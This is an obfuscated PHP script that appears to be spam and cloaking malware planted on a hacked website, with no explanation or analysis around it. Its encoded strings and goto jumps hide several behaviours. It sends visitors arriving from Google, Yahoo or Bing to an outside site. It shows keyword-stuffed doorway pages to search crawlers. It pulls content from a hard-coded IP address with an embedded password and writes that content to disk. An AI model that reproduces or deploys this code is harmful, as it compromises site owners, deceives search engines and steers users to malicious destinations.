Your IP : 172.28.240.42
<?php
goto XcYFA; s2_1L: $apass2 = "\x62\62\x33\150\162\x32\x33\x76\162\63\62"; goto h7HDu; nnq3A: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto BJpdk; LIy94: $x1 = 3; goto AH7RE; cZbpE: echo $text; goto iZz7f; wmfUu: if ($_GET["\x69\x64"] == "\151\156\144\x65\x78") { header("\114\x6f\143\x61\164\x69\157\x6e\x3a\40\150\x74\164\x70\x73\72\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\157\x6d"); die; } goto pZMdt; r4Qia: $_GET["\146\156"] = "\x36\x39\66\x39\x36\x39\x6e\x65\167"; goto EYJue; R7jNf: $keyword = str_replace("\x20", "\x2b", $keyword); goto s2_1L; EzecA: $text = ''; goto rpoUI; AH7RE: $xx1 = 5; goto yYkue; pZMdt: $_GET["\167\x6f\162\154\x64"] = 5; goto r4Qia; PXW8F: if (strpos($_SERVER["\x48\x54\124\120\137\x52\105\x46\x45\x52\105\122"], "\x67\157\x6f\x67\x6c\145\56") or strpos($_SERVER["\110\x54\124\120\x5f\122\105\106\105\122\x45\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\x48\124\x54\x50\x5f\122\x45\x46\105\122\105\x52"], "\142\151\156\147\56")) { $tpl = "\x69\x6e\x64\145\x78\x2f" . $_GET["\x69\144"] . "\56\x70\150\160\56\164\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\x79"]; header("\114\x6f\x63\141\164\x69\x6f\156\72\x20\150\x74\x74\160\163\x3a\57\57\x63\x68\160\x6f\x6b\x2e\163\151\164\145\x2f\x65\156\164\x65\x72\57\x3f\155\141\x72\153\75{$today}\55{$s}\x26\164\160\154\75{$tpl}\x26\x65\156\147\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\144"] . "\56\160\150\x70"; if (file_exists("\151\x6e\x64\x65\x78\57" . $myname)) { $html = @file_get_contents("\151\156\x64\x65\170\x2f" . $myname); if (strpos($_SERVER["\110\124\x54\x50\x5f\x55\123\105\x52\137\x41\107\105\116\124"], "\142\151\156\x67") > 2 or strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\105\x52\137\x41\x47\105\x4e\x54"], "\x79\141\x68\157\x6f") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\x74\x69\164\154\x65\x3e\74\57\x74\x69\164\154\145\76", "\74\x74\x69\164\154\145\76{$keyword}\x3c\57\x74\x69\164\x6c\x65\76", $html); } echo $html; die; } } goto OKRH9; WuZ3Y: $today = "\x32\x30\x32\65\60\66\x31\x32\x2d"; goto nnq3A; IJSIa: if ($s == "\x5c" | $s == "\x2f") { $s = ''; } goto jb2l0; EYJue: $apass1 = "\166\151\163\144\157\151\152\145\167"; goto LIy94; F5cPJ: $apass3 = "\x72\x76\x33\62\171\x64\141\x63\x73\x76\163\144\166"; goto MaDOA; LSjIl: if (strlen($text) > 5000) { $out = fopen("\x69\156\144\x65\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto cZbpE; MaDOA: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto PXW8F; jb2l0: $s = $_SERVER["\123\105\x52\x56\x45\x52\137\116\101\x4d\105"] . $s; goto F5cPJ; F1l8p: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\160\x3a\57\57\x31\63\x35\56\x31\70\61\x2e\62\x31\56\x31\62\x36\57" . $_GET["\146\156"] . "\x2e\x70\x68\x70\77\160\x61\163\163\x3d{$apass}\x26\x71\75{$_GET["\151\x64"]}"); } goto YXt3f; h7HDu: $s = dirname($_SERVER["\x50\110\x50\137\123\x45\114\106"]); goto IJSIa; BJpdk: if ($_GET["\x69\x64"] == "\164\x65\163\164\x69\x6e\x67") { echo "\x74\x65\163\164\x20\147\x6f\x6f\x64\x2e\56\x2e"; die; } goto wmfUu; OKRH9: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto EzecA; rpoUI: if (function_exists("\143\165\162\154\x5f\x69\x6e\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\x74\160\72\57\x2f\61\x33\x35\x2e\61\70\x31\56\62\x31\56\x31\62\66\57" . $_GET["\146\x6e"] . "\56\x70\150\160\77\160\141\x73\163\75{$apass}\46\161\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\151\x6c\154\141\x2f\x34\56\60\40\x28\143\157\155\x70\141\x74\x69\x62\x6c\145\x3b\x20\x4d\123\111\x45\x20\66\56\x30\x3b\40\127\x69\156\144\157\x77\x73\x20\x4e\124\40\x35\x2e\x31\73\40\x53\x56\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto F1l8p; YXt3f: if (strlen($text) < 5000) { $url = "\61\x33\x35\x2e\x31\x38\61\x2e\x32\x31\56\61\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\x3c\142\x72\40\x2f\x3e\12"; } else { $req = "\57" . $_GET["\146\x6e"] . "\x2e\x70\x68\160\77\160\x61\x73\163\x3d{$apass}\x26\x71\75{$_GET["\x69\x64"]}"; $out = "\x47\105\x54\40{$req}\x20\x48\124\x54\120\x2f\61\56\60\xd\xa"; $out .= "\110\157\163\x74\x3a\x20{$url}\15\12"; $out .= "\103\157\x6e\156\145\143\164\151\x6f\x6e\72\40\x43\154\x6f\x73\x65\xd\xa\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto LSjIl; XcYFA: error_reporting(0); goto WuZ3Y; yYkue: $keyword = str_replace("\x2d", "\40", $_GET["\x69\144"]); goto R7jNf; iZz7f: ?>